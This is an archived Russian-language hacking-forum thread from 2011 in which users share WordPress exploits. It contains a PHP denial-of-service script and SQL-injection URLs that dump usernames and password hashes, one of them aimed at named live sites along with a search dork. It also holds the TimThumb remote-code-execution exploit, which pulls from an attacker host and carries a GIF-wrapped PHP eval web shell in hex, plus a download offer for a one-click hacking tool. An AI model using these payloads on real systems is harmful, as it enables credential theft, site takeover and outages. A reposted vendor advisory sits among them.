ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

07.04.2011, 17:53
|
|
Познающий
Регистрация: 01.03.2009
Сообщений: 85
Провел на форуме: 272527
Репутация:
19
|
|
Wordpress 3.0.1 - Remote Denial Of Service Exploit
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'wp-links-opml.php?link_cat=--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]CURLOPT_USERAGENT[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.5.24 Version/10.52'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]CURLOPT_ENCODING[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'gzip, deflate'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]CURLOPT_POST[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]CURLOPT_POSTFIELDS[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'search_keywords='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]CURLOPT_TIMEOUT[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$timeout[/COLOR][COLOR="#007700"],
);
[/COLOR][COLOR="#0000BB"]curl_setopt_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$opts[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_multi_add_handle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]]);
}
[/COLOR][COLOR="#0000BB"]$t[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
do
{
[/COLOR][COLOR="#0000BB"]curl_multi_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]usleep[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]100000[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$t[/COLOR][COLOR="#007700"]++;
if([/COLOR][COLOR="#0000BB"]$t[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]$ptimeout[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]curl_multi_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]);
for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
|
|
|

30.04.2011, 15:08
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Было время, нашёл уязвимость под нужный двиг:
SQL-иньекция:URL:/wp-content/plugins/wpforum/sendmail.php
Версия: WordPress 2.7.1
Уязвимый параметр: GET-id
Эксплоит: /wp-content/plugins/wpforum/sendmail.php?action=quote&id=1+union+select+1,2,3+--+
|
|
|

18.05.2011, 15:52
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 20
Провел на форуме: 86381
Репутация:
16
|
|
2SergioBlog возможно, Flash XSS.
_http://www.securitylab.ru/analytics/216391.php
_http://www.inattack.ru/article/572.html
+ моя заметка _http://ramb.datapunk.ru/index.php/2011/04/flash-xss-persistent/
|
|
|

12.07.2011, 11:11
|
|
Guest
Сообщений: n/a
Провел на форуме: 9121
Репутация:
1
|
|
WordPress 3.1.3 SQL Injection Vulnerabilities
Код:
Code:
SEC Consult Vulnerability Lab Security Advisory
=======================================================================
title: Multiple SQL Injection Vulnerabilities
product: WordPress
vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions
fixed version: 3.1.4/3.2-RC3
impact: Medium
homepage: http://wordpress.org/
found: 2011-06-21
by: K. Gudinavicius
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"WordPress was born out of a desire for an elegant, well-architectured
personal publishing system built on PHP and MySQL and licensed under
the GPLv2 (or later). It is the official successor of b2/cafelog.
WordPress is fresh software, but its roots and development go back to
2001."
Source: http://wordpress.org/about/
Vulnerability overview/description:
-----------------------------------
Due to insufficient input validation in certain functions of WordPress
it is possible for a user with the "Editor" role to inject arbitrary
SQL commands. By exploiting this vulnerability, an attacker gains
access to all records stored in the database with the privileges of the
WordPress database user.
Proof of concept:
-----------------
1) The get_terms() filter declared in the wp-includes/taxonomy.php file
does not properly validate user input, allowing an attacker with
"Editor" privileges to inject arbitrary SQL commands in the "orderby"
and "order" parameters passed as array members to the vulnerable filter
when sorting for example link categories.
The following URLs could be used to perform blind SQL injection
attacks:
http://localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL
injection]&order=[SQL injection]
http://localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL
injection]&order=[SQL injection]
http://localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL
injection]&order=[SQL injection]
2) The get_bookmarks() function declared in the
wp-includes/bookmark.php file does not properly validate user input,
allowing an attacker with "Editor" privileges to inject arbitrary SQL
commands in the "orderby" and "order" parameters passed as array
members to the vulnerable function when sorting links.
The following URL could be used to perform blind SQL injection attacks:
http://localhost/wp-admin/link-manager.php?orderby=[SQL
injection]&order=[SQL injection]
Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in version 3.1.3 of
WordPress, which is the most recent version at the time of discovery.
Vendor contact timeline:
------------------------
2011-06-22: Contacting vendor through security () wordpress org
2011-06-22: Vendor reply, sending advisory draft
2011-06-23: Vendor confirms security issue
2011-06-30: Vendor releases patched version
2011-07-01: SEC Consult publishes advisory
Solution:
---------
Upgrade to version 3.1.4 or 3.2-RC3
Workaround:
-----------
A more restrictive role, e.g. "Author", could be applied to the user.
Advisory URL:
-------------
https://www.sec-consult.com/en/advisories.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com
EOF K. Gudinavicius / @2011
|
|
|
|

16.07.2011, 15:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 60692
Репутация:
6
|
|
Сообщение от z0mbyak
z0mbyak said:
Доброго времени суток, ковырял тут водпресс и вот что наковырял)
Тип: SQL-Inj
Плагин: Хрен его знает как он называется точно, так как пасс не подобрал) но какой-то фейсбуковский)
Dork: inurl:"fbconnect_action=myhome"
Собственно PoC:
http://www.sociable.es/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z0mbyak,7,8,9,10,11,12+from+wp_users--
или
http://binaries.ru/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z0mbyak,7,8,9,10,11,12+from+wp_users--
P.S. Вроде не боян, хотя с вордпрессом не работаю, поэтому не в курсе)
P.P.S В Google
Развлекайтесь)))
Набросал мини-прогу:
 Мечта всех! Кнопка "Взломать" теперь работает
 Инструкция:
Находим уязвимые сайт и вводим в прогу без http:// и без слешов(/)
Типа binaries.ru и получаем логин:пасс в Result
Скачать: _http://rghost.ru/14736221
|
|
|
|

03.08.2011, 22:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 9121
Репутация:
1
|
|
WordPress TimThumb Plugin - Remote Code Execution
Код:
Code:
# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
# Date: 3rd August 2011
# Author: MaXe
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.32
# Screenshot: See attachment
# Tested on: Windows XP + Apache + PHP (XAMPP)
WordPress TimThumb (Theme) Plugin - Remote Code Execution
Versions Affected:
1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
(Version 1.33 did not save the cache file as .php)
Info: (See references for original advisory)
TimThumb is an image resizing utility, widely used in many WordPress themes.
External Links:
http://www.binarymoon.co.uk/projects/timthumb/
http://code.google.com/p/timthumb/
Credits:
- Mark Maunder (Original Researcher)
- MaXe (Indepedendent Proof of Concept Writer)
-:: The Advisory ::-
TimThumb is prone to a Remote Code Execution vulnerability, due to the
script does not check remotely cached files properly. By crafting a
special image file with a valid MIME-type, and appending a PHP file at
the end of this, it is possible to fool TimThumb into believing that it
is a legitimate image, thus caching it locally in the cache directory.
Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.)
http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php
Stored file on the Target: (This can change from host to host.)
1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.
Proof of Concept File:
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
(Transparent GIF +
-:: Solution ::-
Update to the latest version 1.34 or delete the timthumb file.
NOTE: This file is often renamed and you should therefore issue
a command like this in a terminal: (Thanks to rAWjAW for this info.)
find . | grep php | xargs grep -s timthumb
Disclosure Information:
- Vulnerability Disclosed (Mark Maunder): 1st August 2011
- Vulnerability Researched (MaXe): 2nd August 2011
- Disclosed at The Exploit Database: 3rd August 2011
References:
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/
http://code.google.com/p/timthumb/issues/detail?id=212
http://programming.arantius.com/the+smallest+possible+gif
|
|
|
|

04.08.2011, 18:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 4100
Репутация:
74
|
|
PLUGIN :: [0day] AlixcaN Canlı Yayın Eklentisi ver.1.0 [SQL-inj]
alixcan_life_f.php
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]){echo[/COLOR][COLOR="#DD0000"]'Gönderdiğiniz Feedler
ID
Mesaj
Tarih
'[/COLOR][COLOR="#007700"];
while ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"])){
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baslik[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
}
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
if([/COLOR][COLOR="#0000BB"]$sayfalar[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]Sayfalar: '[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'index.php?feedlist=alix_feed_list&'[/COLOR][COLOR="#007700"];
for([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]'[/COLOR][COLOR="#007700"];
echo ([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
echo[/COLOR][COLOR="#DD0000"]'Feed Gönder'[/COLOR][COLOR="#007700"];
}elseif(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#DD0000"]'dashboard_alix_live#dashboard_alix_live'[/COLOR][COLOR="#007700"]){
echo[/COLOR][COLOR="#DD0000"]'
Kullanımı Cok Basit Ve Bloğuna Bağlı Bir Yazar İçin Gayet Hoş Bir Eklenti.
Facebooktaki "Ne Düşünüyorsunuz?" Mantığı İle Benzer. Bir Yazı, Resim Veya Hem Yazı Hem Resim Paylaşma İmkanı Sağlamaktadır.
Bu Yazıları
[alixcan_live_feed] - Tüm Yazıları Listeler
[alixcan_live_feed id=""] - Belirlediğiniz Yazıyı İstediğiniz Yerde Listeler
Yukarıdaki Shortcodeları Kullanarak İstediğiniz Şekilde Listeletebilirsiniz.
'[/COLOR][COLOR="#007700"];
} else{[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]$baslik[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'resim'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$resim[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$date
[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]insert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'wp_alixlivefeed'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$veri_dizisi[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]'Yazı Eklendi'[/COLOR][COLOR="#007700"];
}[/COLOR][COLOR="#FF8000"]/*submittwit bitimi */[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
jQuery(document).ready(function() {
jQuery('#upload_image_button').click(function() {
formfield = jQuery('#upload_image').attr('name');
tb_show('', 'media-upload.php?type=image&TB_iframe=true');
return false;
});
window.send_to_editor = function(html) {
imgurl = jQuery('img',html).attr('src');
jQuery('#upload_image').val(imgurl);
tb_remove();
}
});
Başlık:En Fazla 255 Karakter
Resim:
Resim Dosyası Yükleyebilirsiniz Yada Direk Link Yazabilirsiniz.Dosya Yüklendikten Sonra Yazıya Dahil Et Butonuna Basınız Link Otomatik Eklenicektir
[/COLOR]" />
Feedleri Listele
[COLOR="#0000BB"]Kapat'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]'Hakkında'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]wp_add_dashboard_widget[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'alixcan_live_feed_ali'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Canlı Yayın & Live Feed'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$yazi[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'alixcan_live_feed_ali'[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]add_action[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'wp_dashboard_setup'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'alixcan_live_feed_setup'[/COLOR][COLOR="#007700"]);
function[/COLOR][COLOR="#0000BB"]head_ekle[/COLOR][COLOR="#007700"](){
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]add_action[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'wp_head'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'head_ekle'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]add_shortcode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'alixcan_live_feed'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'alixcan_live_feed_shortcode'[/COLOR][COLOR="#007700"]);
function[/COLOR][COLOR="#0000BB"]alixcan_live_feed_shortcode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$atts[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]){
global[/COLOR][COLOR="#0000BB"]$post[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]extract[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]shortcode_atts[/COLOR][COLOR="#007700"]( array([/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) ,[/COLOR][COLOR="#0000BB"]$atts[/COLOR][COLOR="#007700"]) );
if(empty([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$sayfa_basina[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sayfa_sor[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT COUNT(`id`) FROM `wp_alixlivefeed`"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$sayfalar[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ceil[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]mysql_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sayfa_sor[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) /[/COLOR][COLOR="#0000BB"]$sayfa_basina[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]= (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'alix_sayfa'[/COLOR][COLOR="#007700"]])) ? (int)[/COLOR][COLOR="#0000BB"]abs[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'alix_sayfa'[/COLOR][COLOR="#007700"]]) :[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$basla[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) *[/COLOR][COLOR="#0000BB"]$sayfa_basina[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM wp_alixlivefeed LIMIT[/COLOR][COLOR="#0000BB"]$basla[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$sayfa_basina[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"])>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]){echo[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"];
while ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"])){
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
echo (!empty([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"])) ?[/COLOR][COLOR="#DD0000"]'[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" target="_blank" title="'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baslik[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'">[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" />'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baslik[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"];
}echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}else{
echo[/COLOR][COLOR="#DD0000"]'Henüz İçerik Girilmemiş'[/COLOR][COLOR="#007700"];
}
if([/COLOR][COLOR="#0000BB"]$sayfalar[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]Sayfalar: '[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_option[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'home'[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]'?p='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]get_the_ID[/COLOR][COLOR="#007700"]();
for([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]'[/COLOR][COLOR="#007700"];
echo ([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}else{
[/COLOR][COLOR="#0000BB"]$sqlsor[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM wp_alixlivefeed WHERE id='[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sqlsor[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
echo (!empty([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"])) ?[/COLOR][COLOR="#DD0000"]'[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" target="_blank" title="'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baslik[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'">[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" />'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baslik[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"];
}[/COLOR][COLOR="#FF8000"]//else
[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#FF8000"]// func biter[/COLOR][/COLOR]
exploit:
Код:
Code:
http://wp/?alixcan_live_feed=news&id=1+UNION+SELECT+group_concat(user_login,0x3a,user_pass+SEPARATOR+0x3c62723e),2,3,4+FROM+wp_users--
|
|
|
|

